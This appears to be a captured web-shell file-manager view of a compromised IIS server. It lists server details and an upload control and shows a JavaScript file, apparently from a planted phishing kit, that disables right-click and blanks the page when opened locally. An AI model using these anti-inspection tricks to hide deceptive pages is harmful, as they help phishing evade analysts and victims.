HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/PHerau/ha.health-science.be/wwwroot/Icons/Zx/-/main.js.download
(function() {
    if (!['localhost', '127.0.0.1'].includes(window.location.hostname)) {
        document.addEventListener('contextmenu', function(event) {
            alert('Right click is disabled.');
            event.preventDefault();
        });
    }

    if (window.location.host === '') {
        document.addEventListener('readystatechange', function() {
            if (document.readyState === 'interactive' || document.readyState === 'complete') {
                document.body.innerHTML = '';
            }
        });
    }

    // Prevent auto-execution of scripts when no explicit dataType was provided (See https://github.com/jquery/jquery/issues/2432)
    jQuery.ajaxPrefilter(function(s) {
        if (s.crossDomain) {
            s.contents.script = false;
        }
    });
})();